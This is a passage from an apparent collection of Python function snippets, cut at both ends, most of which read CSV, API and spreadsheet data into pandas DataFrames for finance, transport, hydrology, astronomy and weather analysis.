\"income\"\n # path = _os.path.join(datapath(setup=False), stock, name)\n path = datapath(True, stock, name)\n df = _pd.read_csv(path)\n _gc.collect()\n return df\n # not setup, normal open_file\n names = ['major_holders', 'top_institutional_holders', 'top_mutual_fund_holders',\n 'Trading_Information', 'Financial_Highlights', 'Valuation_Measures',\n 'Executives', 'Description',\n 'Earnings_Estimate', 'Revenue_Estimate', 'Earnings_History',\n 'EPS_Trend', 'EPS_Revisions', 'Growth_Estimates',\n 'stats', 'statements', 'reports',\n 'Executives', 'Description', 'analysis', 'Summary',\n 'balance', 'cash_flow', 'income']\n if name not in names:\n try:\n name = _path(name) # when client mistakenly input factor instead of sheet name\n except ValueError:\n raise ValueError(\n 'Parameter \"name\" should be the name of the financial sheets, not a factor name...Use path method to '\n 'find the location of a factor')\n path = datapath(True, stock, stock)\n try:\n df = _pd.read_csv(path + '_' + name + '.csv')\n _gc.collect()\n except FileNotFoundError:\n _gc.collect()\n if _os.path.exists(datapath(True, stock)):\n raise ValueError(\"There is no sheet - {} - for company {}. Use main_get to retrieve the sheet\".format\n (name, stock))\n else:\n raise ValueError(\"There is no record of '\" + stock + \"' in database\")\n return df", "def read_csv_ur10(self, csv_file):\r\n df = pd.read_csv(csv_file, sep=';', decimal=',', header=0)\r\n return df", "def process_input_df(df_raw, market, price_col_id):\n # drop all non required columns from data frame\n df = drop_columns(df_raw, [price_col_id])\n\n # rename last price column to uniform convention\n df = df.rename(columns={price_col_id: 'close'})\n\n # calculate required indicators\n df[market + '_rt1'] = np.log(df['close']).diff().shift(1) * 100\n df[market + '_asy5_r'] = df[market + '_rt1'].rolling(window=5).sum() / 5\n df[market + '_asy4_r'] = df[market + '_rt1'].rolling(window=4).sum() / 4\n df[market + '_asy3_r'] = df[market + '_rt1'].rolling(window=3).sum() / 3\n df[market + '_asy2_r'] = df[market + '_rt1'].rolling(window=2).sum() / 2\n\n return df", "def csv_to_close(csv_filepath, field_names):\n\n # TODO: Implement Function\n prices_df = pd.read_csv(csv_filepath, names=field_names)\n\n close_prices = prices_df.pivot(index=\"date\", columns=\"ticker\", values='close')\n\n return close_prices", "def _data_reader(file):\n # Create a dictionary so that filename matches a site name.\n site_dict = {'D05536000': 'NB Niles', 'D05536101': 'NS Channel-Wilmette',\n 'D05536105': 'NB Albany', 'D05536118': 'NB Grand Avenue',\n 'D05536121': 'CH River-Lock', 'D05536123': 'CH River-Columbus',\n 'D05536137': 'CSSC-Western Avenue', 'D05536140': 'CSSC-Stickney',\n 'D05536275': 'Thorn Creek', 'D05536290': 'Little Calument',\n 'D05536340': 'Midlothian Creek', 'D05536343': 'Natalie Creek',\n 'D05536357': 'Grand Calumet', 'D05536500': 'Tinley Creek',\n 'D05536700': 'Calumet-Sag Channel', 'D05536890': 'CSSC-Lemont',\n 'D05536995': 'CSSC-Romeoville'}\n df_raw = pd.read_csv(file)\n df_raw['dateTime'] = pd.to_datetime(df_raw['dateTime'])\n # Creating a dataframe with the data we only need.\n df = df_raw[['dateTime', 'X_00065_00000']]\n df = df.set_index(df_raw['dateTime'])\n\n # Retrieve site information to be used in saved excel filenames.\n site_code = file[-9:]\n site_name = [v for v in site_dict.items() if site_code in v][0]\n site = site_code + '_' + site_name[1].replace(' ', '-')\n\n # Convert index into a datetime index for easier indexing.\n df.index = pd.to_datetime(df.index)\n return df_raw, df, site, site_code", "def get_crypto_daily_price(cryptotickers = [], allData=False,limit = 90):\n api_key = os.getenv(\"CC_API\")\n ticker_list = cryptotickers\n crypto_df = pd.DataFrame()\n\n for ticker in ticker_list:\n #if allData is true, then it gets all the data available. If not, select data according to limit.\n if allData:\n url = f\"https://min-api.cryptocompare.com/data/v2/histoday?fsym={ticker}&tsym=USD&allData=true&api_key={api_key}\"\n else:\n url = f\"https://min-api.cryptocompare.com/data/v2/histoday?fsym={ticker}&tsym=USD&limit={limit}&api_key={api_key}\"\n \n raw_data = read_json(url)\n #print(json.dumps(raw_data, indent=5))\n df = pd.DataFrame(raw_data['Data']['Data'])\n df['time'] = pd.to_datetime(df['time'],unit='s')\n df.set_index(df['time'], inplace=True)\n df['close'] = df['close'].astype(float)\n crypto_df[ticker] = df['close']\n \n #\n new_columns = pd.MultiIndex.from_product([ crypto_df.columns, [\"close\"] ])\n crypto_df.columns = new_columns\n\n return crypto_df", "def create_from_csv(self, file_path):\n securities = []\n\n with open(file_path, \"r\") as f:\n # skip the first line (=column names)\n next(f)\n\n for line in f:\n security_code, num_shares = line.strip(\"\\n\").split(\",\")\n # omit the trailing 0\n symbol = security_code[:-1]\n num_shares = int(num_shares)\n\n if symbol in self.securities.keys():\n self.securities[symbol].shares = num_shares\n\n return securities", "def load(cls, path, start_date=None):\n results = []\n skipped = []\n closes = cls.load_daily()\n configs = SymbolConfigurations.load()\n pnls = pd.read_csv(path, parse_dates=True, index_col=0)\n for key in pnls:\n try:\n print(\"Processing strategy: {}\".format(key))\n id, symbol, period, name = key.split(\"_\")[:4]\n multipoint = configs.basic[\"MultiPioint\"].loc[symbol]\n close = closes[symbol.lower()]\n new_dataframe = pd.concat([pnls[key], close * multipoint * 1.0 / LEVERAGE], join=\"inner\", axis=1)\n new_dataframe.columns = [\"pnl\", \"base\"]\n new_dataframe[\"return\"] = new_dataframe[\"pnl\"] / new_dataframe[\"base\"]\n if start_date:\n new_dataframe = new_dataframe[start_date:]\n results.append(cls(id, name, symbol, period, new_dataframe))\n except Exception as e:\n print(e)\n skipped.append(key)\n\n print(\"The following strategies are skipped due to exception in processing: \")\n print(\"\\t{}\".format(skipped))\n return results", "def import_service_learning(filenames):\n\tl = []\n\tfor file in filenames:\n\t\tdf = pd.read_csv(file, header=None, usecols=[10, 12])\n\t\tdf.rename(columns={10: 'ID', 12: 'service_hours'}, inplace=True)\n\t\tdf.dropna(subset=['ID'], inplace=True)\n\t\tdf['ID'] = df['ID'].astype(int) \n\t\tdf.set_index('ID', inplace=True)\n\t\tl.append(df)\n\n\televen, twelve = l\n\tsl_df = eleven.append(twelve)\n\n\treturn sl_df", "def calc_price(filename, opens=open):\n cost_all_item = 0\n with opens(filename, 'rt') as csv_file:\n for row in csv_file.readlines():\n item = row.split(\",\")\n cost_all_item = (float(item[1]) * float(item[2])) + cost_all_item\n csv_file.close()\n return cost_all_item", "def from_csv_to_database():\r\n for year, path in FileNamePath.items():\r\n # load csv files\r\n with open(path, encoding='cp1251') as dataset:\r\n print(f\"Download {year} data\")\r\n get_curr_data(dataset, year)", "def create_raw_data():\r\n for csv_file in glob.glob(raw_loc + 'ticket_data/PRR_*'):\r\n filestring =os.path.basename(csv_file)\r\n index_start = 1\r\n j = 0\r\n start = dt.datetime.now()\r\n print('{} file started at {}'.format(filestring, start.strftime(\"%H:%M\")))\r\n df = pd.read_csv(csv_file, encoding = 'utf-8', parse_dates = ['Tick Issue Date'])\r\n df = df.rename(columns = {c: c.replace(' ', '') for c in df.columns})\r\n try:\r\n df.to_sql('raw_ticket_data', con = conn, if_exists='append')\r\n except:\r\n print('File read error')\r\n\r\n\r\n print ('{} file finished in {:03.2f} minutes '.format(filestring, (dt.datetime.now()-start).seconds / 60))", "def get_rdg_prices_info(infilepath,infilename,outfilepath,outfilename,year,excludeflowid = False):\n \n print(f\"getting RDG prices data for {year} \\n \")\n flow_list, fare_list = getdata(infilepath,infilename)\n \n print(\"splitting the data into flow and fares\\n\")\n flow_df, fares_df = splitter(flow_list, fare_list)\n\n print(\"replacing the outofbounds date values \\n \")\n #replacing the outofbounds date value 31122999 with 31122100\n flow_df['VALID_UNTIL'].replace(['31122999'],['31122100'],inplace=True)\n \n print(\"converting the valid_until into date format \\n\")\n #formatting the date valid until\n flow_df['DATE_VALID_UNTIL'] = flow_df['VALID_UNTIL'].apply(lambda x: pd.to_datetime(str(x),format='%d%m%Y'))\n\n #remove rows where the Valid_Until date != the max value of Valid_Until\n idx = flow_df.groupby(['ORIGIN_CODE','DESTINATION_CODE','ROUTE_CODE'])['DATE_VALID_UNTIL'].transform(max) == flow_df['DATE_VALID_UNTIL']\n flow_df = flow_df[idx]\n\n print(\"exporting the flow and fares with separate info\\n\")\n exportfile(flow_df,outfilepath,'flow_info_'+ year)\n exportfile(fares_df,outfilepath,'fares_info'+ year)\n\n #joining the flow and fares information\n print(\"joining flow and fares information\\n\")\n combined_data = pd.merge(flow_df,fares_df, on='FLOW_ID')\n combined_data.reset_index(drop=True, inplace=True)\n combined_data.index.name=\"FLOW_AND_FARES_INDEX\"\n\n #add the filter for given year for flow_id to remove duplicate flow id information\n #combined_data_no_duplicates = removeRDGduplicates(combined_data, year,excludeflowid)\n\n #reading in the lookup value for the LENNON codes lookup\n lookupinfo = pd.read_excel(infilepath +'Lennon_product_codes_and_Fares_ticket_types_2017.xlsx','Fares to Lennon coding')\n\n ##join lookupinfo with Lennon keys\n combined_data_with_lennon = pd.merge(combined_data,lookupinfo,'left',left_on=['TICKET_CODE'],right_on=['Fares ticket type code'])\n\n # remove duplicates where fares are the same\n combined_data_with_lennon.drop_duplicates(subset=['ORIGIN_CODE','DESTINATION_CODE','ROUTE_CODE','TICKET_CODE','FARE'],keep='first',inplace=True)\n \n #flag up duplicates where fares are different\n flowandfaresduplicateflag = combined_data_with_lennon.duplicated(subset=['ORIGIN_CODE','DESTINATION_CODE','ROUTE_CODE','TICKET_CODE'],keep=False)\n duplicateswithdifferentfares = combined_data_with_lennon[flowandfaresduplicateflag]\n exportfile(duplicateswithdifferentfares,outfilepath,\"Duplicates with different fares in flow and fares file for_\" + year)\n\n ##return the completed file\n return combined_data_with_lennon", "def generate_DataFrame(file_path):\n # print (\"Generating DataFrame\")\n __log(1, 'Generating DataFrame....')\n\n df = pd.read_csv(file_path)\n df = df.rename(columns=lambda x: x.strip())\n df = df.dropna()\n\n for i in list(df.keys()):\n df[i] = df[i].apply(cleaning)\n\n # print (\"DataFrame Generated Successfully\")\n __log(1, 'DataFrame Generated Sucessfully.')\n return df", "def read_csv(self, path):\n for file in os.listdir(path):\n if file[-4:] == \".csv\":\n name = file[:-4]\n table_index_header = cfg.get_list(\"table_index_header\", name)\n filename = os.path.join(path, file)\n self.input_data[name] = pd.read_csv(\n filename,\n index_col=list(range(int(table_index_header[0]))),\n header=list(range(int(table_index_header[1]))),\n squeeze=(\"series\" not in name),\n )\n self.check_input_data(warning=False)\n self.add_meta_data()\n return self", "def GetCurrencies():\n return GetDataFromCsvFile('currencies.csv')", "def get_data(filename):\r\n return pd.read_csv(filename)", "def read_data(name: str) -> pd.DataFrame:\n import_dir = Path.cwd().joinpath('eikon_data_files')\n\n path = Path.joinpath(import_dir, Path(name))\n if path.exists():\n return pd.read_csv(path, sep=',')\n else:\n print('File type \"' + name + '.csv' + ' does not exist. Aborted.')\n quit()", "def payment_engine(transaction_filename: str):\n try:\n transaction_list = TransactionList(pd.read_csv(transaction_filename))\n account_manager = AccountManager()\n transaction_list.process(account_manager)\n accounts = account_manager.accounts_data()\n print(accounts.to_csv(index=False))\n except FileNotFoundError:\n pass", "def readData(filename):\n #defining gobal variable (dataframe) to access it outside this function\n global dataframe\n #storing full CSV file into a dataframe(data structure)\n dataframe = pd.read_csv(filename)\n #type casting temperature column of dataframe to numeric data and ignoring '***' values\n dataframe['Temperature'] = pd.to_numeric(dataframe['Temperature'], errors='coerce')\n return dataframe", "def run(self) -> pd.DataFrame:\n with open(self.file_path, 'r') as in_file:\n headers = in_file.readline()\n headers = headers.replace(\"\\n\", \"\")\n\n if ',' in headers:\n headers = headers.split(',')\n else:\n headers = headers.split()\n\n if headers == self.NORMAL_HEADERS:\n return self.normal_csv()\n else:\n return self.read_data_columns_to_rows()", "def separate_file(self):\n df = pd.read_csv(\"nfl_drafts.csv\", names = ['Pick', 'Team', 'Player_name', 'POS', \n 'Age', 'Last_played', 'AP1', 'PB', 'ST', 'CarAV', 'DrAV', 'G_perS', 'PaCmp', 'PaAtt', \n 'PaYds', 'PaTD', 'Int', 'Att', 'Yds', 'RuTD', 'Rec', 'ReYds', 'ReTD', 'Solo', 'DeInt', \n 'Sk', 'Coll/Univ', 'Stat'], error_bad_lines = False)\n return df", "def getrailfinancial(df,outputlocation):\n #create filename with date_and_timestamp\n formatted_date = datetime.datetime.now().strftime('%Y%m%d_%H-%M')\n destinationfilename = f'rail_financial_data_{formatted_date}.xlsx'\n\n # group and sum the superfile by two cuts\n revsplitbytocticketreg = df.groupby(['Carrier TOC / Third Party Code','Product Code','Regulated_Status'],as_index=False).agg({'Adjusted Earnings Amount':['sum']})\n revsplitbytocsectorclasscatreg = df.groupby(['Carrier TOC / Third Party Code','sector','class','Category','Regulated_Status'], as_index=False).agg({'Adjusted Earnings Amount':['sum']})\n\n # rename columns of the group and summed data\n revsplitbytocticketreg.rename(columns = {'Carrier TOC / Third Party Code':'TOC','Product Code':'Ticket','Regulated_Status':'Reg/Unreg','Adjusted Earnings Amount':'Earnings'},inplace=True)\n revsplitbytocsectorclasscatreg.rename(columns = {'Carrier TOC / Third Party Code':'TOC','sector':'Sector','class':'Class','Category':'Category','Regulated_Status':'Reg/Unreg','Adjusted Earnings Amount':'Earnings'},inplace=True) \n\n #prepare excel writer object, export dataframes to two different ranges and save excel file\n writer = pd.ExcelWriter(outputlocation + destinationfilename, engine='xlsxwriter')\n revsplitbytocticketreg.to_excel(writer,sheet_name='rail_financial_data')\n revsplitbytocsectorclasscatreg.to_excel(writer,sheet_name='rail_financial_data',startcol=10 )\n writer.save()", "def fillHistoricalPricesAndRating(self):\r\n time_start = time.time()\r\n self.buildPriceHistory()\r\n savepath = TEMPPATH + 'bondhistoryrating.csv'\r\n #If bondhistoryratingUAT.csv doesn't exist, download data and write file.\r\n cols = ['SNP', 'MDY', 'FTC', 'P1D', 'P1W', 'P1M', 'Y1D', 'Y1W', 'Y1M', 'ACCRUED', 'D2CPN', 'SAVG', 'ISP1D', 'ISP1W', 'ISP1M', 'RISK_MID', 'PRINCIPAL_FACTOR', 'SIZE']\r\n if not (os.path.exists(savepath)) or datetime.datetime.fromtimestamp(\r\n os.path.getmtime(savepath)).date() < datetime.datetime.today().date():\r\n isins = self.df['ISIN'] + BBGHand + ' Corp'\r\n isins = list(isins.astype(str))\r\n\r\n ##\r\n flds = ['RTG_SP', 'RTG_MOODY', 'RTG_FITCH', 'INT_ACC', 'DAYS_TO_NEXT_COUPON', 'YRS_TO_SHORTEST_AVG_LIFE', 'RISK_MID', 'PRINCIPAL_FACTOR', 'AMT_OUTSTANDING']\r\n out = blpapiwrapper.simpleReferenceDataRequest(pandas.Series((self.df['ISIN'] + ' Corp').values, index=self.df.index).to_dict(),flds)[flds]\r\n #loop\r\n for f in flds:\r\n self.df[bbgToBdmDic[f]] = out[f]\r\n self.df['RISK_MID'].fillna(0, inplace=True)\r\n ##\r\n self.df.drop(['P1D', 'P1W', 'P1M', 'Y1D', 'Y1W', 'Y1M', 'ISP1D', 'ISP1W', 'ISP1M'], axis=1, inplace=True)\r\n dbPriceHistory = pandas.read_csv(PHPATH + 'dbPriceHistory.csv', index_col=0)\r\n dbYieldHistory = pandas.read_csv(PHPATH + 'dbYieldHistory.csv', index_col=0)\r\n dbSpreadHistory = pandas.read_csv(PHPATH + 'dbSpreadHistory.csv', index_col=0)\r\n hdt = []\r\n if self.dtYesterday.strftime('%Y%m%d') in dbPriceHistory.columns:\r\n hdt.append(self.dtYesterday.strftime('%Y%m%d'))\r\n else:\r\n self.df['P1D'] = pandas.np.nan\r\n self.df['Y1D'] = pandas.np.nan\r\n self.df['ISP1D'] = pandas.np.nan\r\n if self.dtLastWeek.strftime('%Y%m%d') in dbPriceHistory.columns:\r\n hdt.append(self.dtLastWeek.strftime('%Y%m%d'))\r\n else:\r\n self.df['P1W'] = pandas.np.nan\r\n self.df['Y1W'] = pandas.np.nan\r\n self.df['ISP1W'] = pandas.np.nan\r\n if self.dtLastMonth.strftime('%Y%m%d') in dbPriceHistory.columns:\r\n hdt.append(self.dtLastMonth.strftime('%Y%m%d'))\r\n else:\r\n self.df['P1M'] = pandas.np.nan\r\n self.df['Y1M'] = pandas.np.nan\r\n self.df['ISP1M'] = pandas.np.nan\r\n ohdt = [self.dtYesterday.strftime('%Y%m%d'), self.dtLastWeek.strftime('%Y%m%d'), self.dtLastMonth.strftime('%Y%m%d')]\r\n self.df = self.df.join(dbPriceHistory[hdt], on='ISIN')\r\n self.df.rename(columns={ohdt[0]:'P1D', ohdt[1]:'P1W', ohdt[2]:'P1M'}, inplace=True)\r\n self.df = self.df.join(dbYieldHistory[hdt], on='ISIN')\r\n self.df.rename(columns={ohdt[0]:'Y1D', ohdt[1]:'Y1W', ohdt[2]:'Y1M'}, inplace=True)\r\n self.df = self.df.join(dbSpreadHistory[hdt], on='ISIN')\r\n self.df.rename(columns={ohdt[0]:'ISP1D', ohdt[1]:'ISP1W', ohdt[2]:'ISP1M'}, inplace=True)\r\n\r\n self.df[cols].to_csv(savepath)\r\n self.df['ACCRUED'] = self.df['ACCRUED'].apply(lambda x: '{:,.2f}'.format(float(x)))\r\n self.df['D2CPN'].fillna(-1, inplace=True)\r\n self.df['D2CPN'] = self.df['D2CPN'].astype(int)\r\n self.df[['RISK_MID','PRINCIPAL_FACTOR','SIZE']] = self.df[['RISK_MID','PRINCIPAL_FACTOR','SIZE']].astype(float)\r\n self.df[['SNP', 'MDY', 'FTC']] = self.df[['SNP', 'MDY', 'FTC']].fillna('NA') # ,'ACCRUED','D2CPN'\r\n self.df[['SNP', 'MDY', 'FTC', 'ACCRUED']] = self.df[['SNP', 'MDY', 'FTC', 'ACCRUED']].astype(str)\r\n\r\n #Otherwise, load and read from file.\r\n else:\r\n print 'Found existing file from today'\r\n df = pandas.read_csv(savepath, index_col=0)\r\n self.df[cols] = df[cols]\r\n self.df[['RISK_MID','PRINCIPAL_FACTOR','SIZE','SAVG', 'ISP1D','ISP1W','ISP1M']] = self.df[['RISK_MID','PRINCIPAL_FACTOR','SIZE','SAVG', 'ISP1D','ISP1W','ISP1M']].astype(float)\r\n self.df[['SNP', 'MDY', 'FTC']] = self.df[['SNP', 'MDY', 'FTC']].astype(str)\r\n self.df['ACCRUED'].fillna(-1,inplace=True)#HACK SO NEXT LINE DOESN'T BLOW UP - WE DON'T WANT TO PUT 0 THERE!\r\n self.df['ACCRUED'] = self.df['ACCRUED'].astype(float)\r\n self.df['ACCRUED'] = self.df['ACCRUED'].apply(lambda x: '{:,.2f}'.format(float(x)))\r\n self.df['D2CPN'].fillna(-1, inplace=True)#HACK SO NEXT LINE DOESN'T BLOW UP - WE DON'T WANT TO PUT 0 THERE!\r\n self.df['D2CPN'] = self.df['D2CPN'].astype(int) \r\n\r\n print 'History fetched in: ' + str(int(time.time() - time_start)) + ' seconds.'", "def read_csv(config, input_file_path):\n header = read_csv_header(input_file_path)\n\n general = config['general']\n date_cols_types = ['date_cols',\n 'first_exp_date_cols',\n 'last_exp_date_cols',\n 'index_date_col',\n 'lookback_date_col']\n date_cols = utils.generate_list_columns(header, config, date_cols_types)\n # it turns out we should read the dates first in as strings\n date_cols_types = {date_col: str for date_col in date_cols}\n df = pd.read_csv(input_file_path, dtype=date_cols_types)\n # convert string dates to dates using the date format\n # Large dataset, conversion done in parallel\n if len(date_cols) > 50 or (df.shape[0] > 20000 and len(date_cols) > 1):\n print('parallel!')\n # we have to do this in parallel otherwise it takes forever\n df[date_cols] = parse_utils.apply_parallel(df[date_cols],\n parse_utils.parse_dates,\n format=general['date_format'])\n # Small dataset, faster to convert in non-parallel fashion\n elif len(date_cols) > 0:\n df[date_cols] = df[date_cols].apply(pd.to_datetime,\n format=general['date_format'])\n return df", "def readSolarData(filename):\n\treturn pd.read_csv(filename)", "def import_exodus_wallet(exodus_wallet_dir=None):\n exodus_wallets = [x for x in os.listdir(exodus_wallet_dir) if x.endswith(\".csv\")]\n\n exodus_wallet = pd.DataFrame()\n # load all wallet csvs\n for wallet in exodus_wallets:\n df = pd.read_csv(os.path.join(exodus_wallet_dir, wallet))\n exodus_wallet = exodus_wallet.append(df, ignore_index=True)\n\n # fix the formating\n exodus_wallet['DATE'] = [datetime.strptime(t,'%a %b %d %Y %H:%M:%S GMT%z (%Z)') for t in exodus_wallet['DATE']]\n exodus_wallet['DATE'] = exodus_wallet['DATE'].astype('datetime64[ns]')\n exodus_wallet['COINAMOUNT'], exodus_wallet['AMOUNT_COIN'] = exodus_wallet['COINAMOUNT'].str.split(' ', 1).str\n exodus_wallet['COINAMOUNT'] = exodus_wallet['COINAMOUNT'].astype(float)\n exodus_wallet['BALANCE'], exodus_wallet['BALANCE_COIN'] = exodus_wallet['BALANCE'].str.split(' ', 1).str\n exodus_wallet['BALANCE'] = exodus_wallet['BALANCE'].astype(float)\n exodus_wallet['FEE'], exodus_wallet['FEE_COIN'] = exodus_wallet['FEE'].str.split(' ', 1).str\n exodus_wallet['FEE'] = exodus_wallet['FEE'].astype(float)\n\n # rename columns to common names\n exodus_wallet.columns = ['TXID',\n 'TXURL',\n 'Timestamp',\n 'COINAMOUNT',\n 'COIN_TransferFee',\n 'Balance',\n 'EXCHANGE',\n 'Notes',\n 'AMOUNT_COIN',\n 'BALANCE_COIN',\n 'FEE_COIN']\n exodus_wallet['WalletName'] = 'Exodus'\n\n\n return exodus_wallet", "def prepare_data():\n df = pd.read_csv('Wholesale customers data.csv')\n df_numeric = df[['Fresh', 'Milk', 'Grocery', 'Frozen', 'Detergents_Paper', 'Delicassen']]\n return df, df_numeric", "def get_data():\r\n data = pd.read_csv(FILE_PATH)\r\n # Replace 'Zero KM' by year 2022 assuming it's a new car\r\n data['Ano'] = data['Ano'].str.replace('Zero KM', '2021').replace('2022', '2021')\r\n data['Ano'] = data['Ano'].astype(int)\r\n data['Automático'] = data['Automático'].astype(int)\r\n return data", "def read_data(path_to_file, survey):\n if survey == 'eco':\n columns = ['name', 'radeg', 'dedeg', 'cz', 'grpcz', 'absrmag', \n 'logmstar', 'logmgas', 'grp', 'grpn', 'logmh', 'logmh_s', \n 'fc', 'grpmb', 'grpms']\n\n # 13878 galaxies\n eco_buff = pd.read_csv(path_to_file,delimiter=\",\", header=0, \\\n usecols=columns)\n\n # 6456 galaxies \n catl = eco_buff.loc[(eco_buff.cz.values >= 3000) & \\\n (eco_buff.cz.values <= 7000) & (eco_buff.absrmag.values <= -17.33) &\\\n (eco_buff.logmstar.values >= 8.9)]\n\n volume = 151829.26 # Survey volume without buffer [Mpc/h]^3\n cvar = 0.125\n z_median = np.median(catl.grpcz.values) / (3 * 10**5)\n \n elif survey == 'resolvea' or survey == 'resolveb':\n columns = ['name', 'radeg', 'dedeg', 'cz', 'grpcz', 'absrmag', \n 'logmstar', 'logmgas', 'grp', 'grpn', 'grpnassoc', 'logmh', \n 'logmh_s', 'fc', 'grpmb', 'grpms', 'f_a', 'f_b']\n # 2286 galaxies\n resolve_live18 = pd.read_csv(path_to_file, delimiter=\",\", header=0, \\\n usecols=columns)\n\n if survey == 'resolvea':\n catl = resolve_live18.loc[(resolve_live18.f_a.values == 1) & \\\n (resolve_live18.grpcz.values > 4500) & \\\n (resolve_live18.grpcz.values < 7000) & \\\n (resolve_live18.absrmag.values < -17.33) & \\\n (resolve_live18.logmstar.values >= 8.9)]\n\n\n volume = 13172.384 # Survey volume without buffer [Mpc/h]^3\n cvar = 0.30\n z_median = np.median(resolve_live18.grpcz.values) / (3 * 10**5)\n \n elif survey == 'resolveb':\n # 487 - cz, 369 - grpcz\n catl = resolve_live18.loc[(resolve_live18.f_b.values == 1) & \\\n (resolve_live18.grpcz.values > 4500) & \\\n (resolve_live18.grpcz.values < 7000) & \\\n (resolve_live18.absrmag.values < -17) & \\\n (resolve_live18.logmstar.values >= 8.7)]\n\n volume = 4709.8373 # *2.915 #Survey volume without buffer [Mpc/h]^3\n cvar = 0.58\n z_median = np.median(resolve_live18.grpcz.values) / (3 * 10**5)\n\n return catl,volume,cvar,z_median", "def get_data():\n\n size, intensity, age = [], [], []\n def calculate(data, data_top):\n \"\"\"Return age and the averages of size and intensity.\"\"\"\n size, intensity, age = np.array([data[\"Size\"]]), np.array([data[\"Intensity\"]]), data_top.iat[1,0]\n size_avg, intensity_avg = np.average(size), np.average(intensity)\n return size_avg, intensity_avg, age\n \n with os.scandir(\"imgdata/\") as files:\n for entry in files:\n data = pd.read_csv(entry, header=3, index_col=0)\n data_top = pd.read_csv(entry, index_col=0, nrows=2, header=None)\n result = calculate(data, data_top)\n size.append(result[0])\n intensity.append(result[1])\n age.append(result[2])\n return size, intensity, age", "def GetOpsRates():\n return GetDataFromCsvFile('ops_rates.csv')", "def _read_data(self, fp):\n names = [\n \"Year\",\n \"Month\",\n \"Day\",\n \"Hour\",\n \"Minute\",\n \"Data Source and Uncertainty Flags\",\n \"Dry Bulb Temperature\",\n \"Dew Point Temperature\",\n \"Relative Humidity\",\n \"Atmospheric Station Pressure\",\n \"Extraterrestrial Horizontal Radiation\",\n \"Extraterrestrial Direct Normal Radiation\",\n \"Horizontal Infrared Radiation Intensity\",\n \"Global Horizontal Radiation\",\n \"Direct Normal Radiation\",\n \"Diffuse Horizontal Radiation\",\n \"Global Horizontal Illuminance\",\n \"Direct Normal Illuminance\",\n \"Diffuse Horizontal Illuminance\",\n \"Zenith Luminance\",\n \"Wind Direction\",\n \"Wind Speed\",\n \"Total Sky Cover\",\n \"Opaque Sky Cover (used if Horizontal IR Intensity missing)\",\n \"Visibility\",\n \"Ceiling Height\",\n \"Present Weather Observation\",\n \"Present Weather Codes\",\n \"Precipitable Water\",\n \"Aerosol Optical Depth\",\n \"Snow Depth\",\n \"Days Since Last Snowfall\",\n \"Albedo\",\n \"Liquid Precipitation Depth\",\n \"Liquid Precipitation Quantity\",\n ]\n\n first_row = self._first_row_with_climate_data(fp)\n df = pd.read_csv(fp, skiprows=first_row, header=None, names=names)\n return df", "def df_builder(path):\n\n ###CHANGE FILE ENDING (.csv or .csv.gz)\n all_files = glob.glob(\n os.path.join(path, \"probe_data_I210.201710*.csv\")) # advisable to use os.path.join as this makes concatenation OS independent\n df_from_each_file = (pd.read_csv(f) for f in all_files)\n return pd.concat(df_from_each_file, ignore_index=True)", "def createDataFrame(path):\n df = pd.read_csv(path)\n df = df[['planet_name', 'planet_mass', 'orbital_radius', 'host_name', \n 'spectral_type', 'stellar_age', 'stellar_radius', \n 'stellar_mass', 'stellar_temperature', 'stellar_luminosity', \n 'optical_magnitude', 'near_ir_magnitude', \n 'stellar_surface_gravity', 'stellar_metallicity']]\n \n df = df.dropna(subset=['spectral_type'])\n df.spectral_type = df.spectral_type.str[0:1]\n df.spectral_type = df.spectral_type.str.strip()\n classification = np.array(['O','B','A','F','G','K','M'])\n df = df[df.spectral_type.isin(classification)]\n df.insert(4, \"amount_of_planets\", 0)\n df.amount_of_planets = df.groupby('host_name')['host_name'].transform('count')\n \n df.planet_mass = np.log10(df.planet_mass)\n df.orbital_radius = np.log10(df.orbital_radius)\n \n df = df.sort_values(by=['host_name'])\n df = df.reset_index(drop=True) \n \n return df", "def prices(tickers):\n try:\n start = dt.datetime.today()\n start = start.strftime('%Y-%m-%d') \n data = pdr.get_data_yahoo(tickers, start=start)\n price = data['Adj Close']\n vol = data['Volume']\n data_dic = {}\n for stock in tickers:\n data_dic[str(stock)] = price[str(stock)][0], vol[str(stock)][0]\n \n df_data = pd.DataFrame(data_dic.values(), columns=['precio_usa', 'volumen_usa'])\n df_data['Ticker'] = tickers\n df_data = df_data.loc[:,['Ticker', 'precio_usa', 'volumen_usa']]\n\n except:\n start = dt.datetime.today()\n start = start - Day(3)\n start = start.strftime('%Y-%m-%d') \n data = pdr.get_data_yahoo(tickers, start=start)\n price = data['Adj Close']\n vol = data['Volume']\n data_dic = {}\n for stock in tickers:\n data_dic[str(stock)] = price[str(stock)][0], vol[str(stock)][0]\n \n df_data = pd.DataFrame(data_dic.values(), columns=['precio_usa', 'volumen_usa'])\n df_data['Ticker'] = tickers\n df_data = df_data.loc[:,['Ticker', 'precio_usa', 'volumen_usa']]\n\n return df_data", "def load_prices(r, name):\n data = r.hgetall(name)\n data = pd.DataFrame(data=map(lambda x: float(x), data.values()),\n index=map(lambda x: pd.Timestamp(x, '%Y-%m-%d'), data.keys()))\n data = data.sort().dropna()\n data.columns = [name]\n data.index.names = ['Date']\n return data", "def get_data_from_disc(symbol, skipFirstLines, size_output = 2):\n\n df1 = pd.read_csv( symbol_to_path(symbol)\n , index_col = 'Date'\n , parse_dates= True\n , usecols = ['Date', 'Close', 'Open', 'High', 'Low', 'Adj Close', 'Volume']\n , na_values = ['nan'])\n\n # Clean NaN values\n df = utils.dropna(df1)\n\n # Add ta features filling NaN values\n #df1 = add_all_ta_features(df, \"Open\", \"High\", \"Low\", \"Close\", fillna=True)#, \"Volume_BTC\",\n\n # Add bollinger band high indicator filling NaN values\n df1['bb_hi10' ] = bollinger_hband_indicator(df1[\"Close\"], n=10 , ndev=2, fillna=True)\n df1['bb_lo10' ] = bollinger_lband_indicator(df1[\"Close\"], n=10 , ndev=2, fillna=True)\n df1['bb_hi20' ] = bollinger_hband_indicator(df1[\"Close\"], n=20 , ndev=2, fillna=True)\n df1['bb_lo20' ] = bollinger_lband_indicator(df1[\"Close\"], n=20 , ndev=2, fillna=True)\n df1['bb_hi50' ] = bollinger_hband_indicator(df1[\"Close\"], n=50 , ndev=2, fillna=True)\n df1['bb_lo50' ] = bollinger_lband_indicator(df1[\"Close\"], n=50 , ndev=2, fillna=True)\n df1['bb_hi200'] = bollinger_hband_indicator(df1[\"Close\"], n=200, ndev=2, fillna=True)\n df1['bb_lo200'] = bollinger_lband_indicator(df1[\"Close\"], n=200, ndev=2, fillna=True)\n\n df1['rsi5' ] = rsi (df1[\"Close\"], n=5 , fillna=True)\n df1['rsi10' ] = rsi (df1[\"Close\"], n=10, 